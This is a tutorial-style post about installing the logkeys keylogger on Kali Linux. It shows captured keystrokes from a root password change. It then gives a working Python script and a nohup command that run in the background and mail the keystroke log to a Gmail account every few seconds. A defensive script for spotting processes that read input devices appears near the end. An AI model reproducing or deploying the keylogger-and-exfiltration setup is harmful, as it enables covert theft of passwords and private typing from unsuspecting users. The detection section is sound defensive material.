logkeys: a keylogger for Linux

logkeys is a keylogger. Its source code is hosted on Google Code, and its home page is https://code.google.com/p/logkeys/
The test environment is Kali Linux.

First, download logkeys.

Extract it:

root@:~# tar -zxvf logkeys*
root@:~# cd logkeys*

Take a look at the INSTALL file:

root@bogon:~/Desktop/logkeys-0.1.1a# cat INSTALL
===============================================================================
 logkeys keylogger - instalation instructions
===============================================================================
Provided your GNU/Linux distribution doesn't include logkeys package in its
repositories, manual installation of logkeys from source is as easy as:
 $ tar xvzf logkeys-0.1.0.tar.gz   # to extract the logkeys archive
 
 $ cd logkeys-0.1.0/build  # move to build directory to build there
 $ ../configure            # invoke configure from parent directory
 $ make                    # make compiles what it needs to compile
 ( become superuser now )  # you need root to install in system dir
 # make install            # installs binaries, manuals and scripts
That's it.
To ever uninstall logkeys, remove accompanying scripts and manuals, issue
 # make uninstall    # in the same logkeys-0.1.0/build dir from before
See README file for usage instructions and notes.
root@bogon:~/Desktop/logkeys-0.1.1a#

The documentation is quite clear. Next comes the build:

root@:~/logkeys-0.1.1a# cd build
root@:~/logkeys-0.1.1a/build# ls
root@:~/logkeys-0.1.1a/build#
// the classic three-step Linux build
root@bogon:~/Desktop/logkeys-0.1.1a/build# ../configure
root@bogon:~/Desktop/logkeys-0.1.1a/build# make
root@bogon:~/Desktop/logkeys-0.1.1a/build# make install
root@bogon:~/Desktop/logkeys-0.1.1a/build# ls 
config.h  config.log  config.status  Makefile  man  scripts  src  stamp-h1
root@bogon:~/Desktop/logkeys-0.1.1a/build# cd src 
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# ls 
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile

logkeys is the binary that was built.

root@bogon:~/Desktop/logkeys-0.1.1a/build/src# cp logkeys /bin
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# ls
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# logjeys  -h
bash: logjeys: 未找到命令
root@bogon:~/Desktop/logkeys-0.1.1a/build/src# logkeys -h
logkeys: invalid option -- 'h'
Usage: logkeys [OPTION]...
Log depressed keyboard keys.
  -s, --start               start logging keypresses
  -m, --keymap=FILE         use keymap FILE
  -o, --output=FILE         log output to FILE [/var/log/logkeys.log]
  -u, --us-keymap           use en_US keymap instead of configured default
  -k, --kill                kill running logkeys process
  -d, --device=FILE         input event device [eventX from /dev/input/]
  -?, --help                print this help screen
      --export-keymap=FILE  export configured keymap to FILE and exit
      --no-func-keys        log only character keys
      --no-timestamps       don't prepend timestamps to log file lines
      --post-http=URL       POST log to URL as multipart/form-data file
      --post-size=SIZE      post log file when size equals SIZE [500k]
Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log
          logkeys -s -d event6
          logkeys -k
logkeys version: 0.1.1a
logkeys homepage: <http://code.google.com/p/logkeys/>
root@bogon:~/Desktop/logkeys-0.1.1a/build/src#

Of the logkeys options, the most troublesome is the "-m" keymap option.
Using the default keymap file, I got the following result:

root@bogon:~# logkeys -k
root@bogon:~# logkeys -s -o /root/.logkeys
root@bogon:~# ls 
Desktop  Downloads  Python
root@bogon:~# cat .logkeys
Logging started ...
2013-11-13 08:36:57+0800 > ka 
2013-11-13 08:37:02+0800 > x܂t ,kofjeya root@bogon:~#

The key mapping is clearly off. The "-u" option can be used to select the standard US keyboard layout:

root@bogon:~# logkeys -s -u -o .test.txt
root@bogon:~# ls 
Desktop  Downloads  Python
root@bogon:~# passwd root
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
root@bogon:~# cat .test.txt
Logging started ...
2013-11-13 08:42:52+0800 > ls 
2013-11-13 08:42:54+0800 > cat .test.txt
2013-11-13 08:42:59+0800 > clear
2013-11-13 08:43:09+0800 > ls 
2013-11-13 08:43:10+0800 > passwd root
2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck
2013-11-13 08:43:29+0800 > f4ck
2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt root@bogon:~#

Done. It would be boring to stop here, though; what comes next is the main point.

#!/usr/bin/env python
#coding=utf-8
import smtplib 
from email.Message import Message 
import time
import optparse
import sched
schedular=sched.scheduler(time.time,time.sleep)
def sendMail(theEmail, thePasswd):
    systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
    try:
        fileObj=open("/root/.logkeys", "r")    # "/root/.logkeys" is the keylogger's output file; change it to match your output file
        content=fileObj.read()
    except:
        print "Cannot read file\n"
        exit()
    message = Message() 
    message['Subject'] = 'Log Keys'    # mail subject
    message['From'] = "599449360@qq.com"
    message['To'] = theEmail
    message.set_payload("当前时间"+systemTime+"\n"+content)    # mail body
    msg = message.as_string() 
  
  
    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20) 
    #smtp.set_debuglevel(1)                 # enable debug mode
    smtp.starttls()                          # use a secure connection
    smtp.login(theEmail, thePasswd)
    smtp.sendmail("599449360@qq.com", theEmail, msg)
    time.sleep(5)                               # avoid calling quit() before the mail has finished sending
    smtp.quit() 
 
 
def perform(inc, theEmail, thePasswd):
    schedular.enter(inc,0,perform,(inc,theEmail, thePasswd))
    sendMail(theEmail, thePasswd)
def myMain(inc, theEmail, thePasswd):
    schedular.enter(0,0,perform,(inc,theEmail, thePasswd))
    schedular.run()
 
 
 
if __name__=="__main__":
    optObj=optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args)=optObj.parse_args()
    
    emailName=options.user
    emailPasswd=options.passwd
    myMain(15, emailName, emailPasswd)  # 15 is the interval between sends; set it to suit your needs

This script periodically reads the logkeys output file and sends it to a Gmail mailbox. Using it is simple too:

root@bogon:~/Python# python mail.py -h
Usage: mail.py [options]
Options:
  -h, --help  show this help message and exit
  -u USER     Gmail account
  -p PASSWD   Gmail Passwd
root@bogon:~/Python# ls 
file.txt  mail.py  nohup.out
root@bogon:~/Python# nohup ./mail.py -u hackersirius0@gmail.com -p passwd &
[1] 7499
root@bogon:~/Python# nohup: 忽略输入并把输出追加到"nohup.out"



I tested with a 15-second interval. In real use nowhere near that frequency is needed; once a day is about right.
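
From the defender's side, the "-d" option in the help output above shows that logkeys reads keystrokes from an event device under /dev/input/, so a running instance shows up as a process holding such a device open. The following is an added example, not part of the original post: it walks /proc and reports those processes. The allowlist of expected process names and the function names are assumptions.

```python
#!/usr/bin/env python3
"""List processes that hold /dev/input/event* open (run as root)."""
import os

# Assumption: names of processes expected to read input devices on this host.
EXPECTED = {"Xorg", "systemd-logind", "gnome-shell"}


def input_device_readers(proc_root="/proc"):
    """Return sorted (pid, comm, device) tuples for open event devices."""
    hits = set()
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
            with open(os.path.join(proc_root, pid, "comm")) as f:
                comm = f.read().strip()
        except OSError:  # process exited, or not permitted to inspect it
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:  # descriptor closed while we were looking
                continue
            if target.startswith("/dev/input/event"):
                hits.add((int(pid), comm, target))
    return sorted(hits)


def unexpected_readers(hits, expected=EXPECTED):
    """Keep only readers whose process name is not on the allowlist."""
    return [h for h in hits if h[1] not in expected]


if __name__ == "__main__":
    for pid, comm, dev in unexpected_readers(input_device_readers()):
        print("pid=%d comm=%s holds %s" % (pid, comm, dev))
```

A process can set its own comm value, so treat the allowlist as triage only and confirm each hit against the target of /proc/<pid>/exe.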

Comments
  1. v7ce

    This py script for sending mail doesn't seem to work
